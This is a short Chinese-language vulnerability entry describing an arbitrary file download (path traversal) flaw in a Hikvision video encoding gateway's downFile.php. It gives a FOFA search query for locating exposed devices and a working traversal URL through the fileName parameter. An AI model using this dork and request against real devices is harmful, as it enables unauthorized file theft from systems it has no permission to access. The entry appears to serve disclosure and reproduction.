HIKVISION 视频编码设备接入网关 任意文件下载

漏洞描述

海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞

漏洞影响

Note

HIKVISION 视频编码设备接入网关

FOFA

Note

title="视频编码设备接入网关"

漏洞复现

漏洞文件为 downFile.php, 其中 参数 fileName 没有过滤危险字符,导致可文件遍历下载

访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件

漏洞利用POC

Last updated

Was this helpful?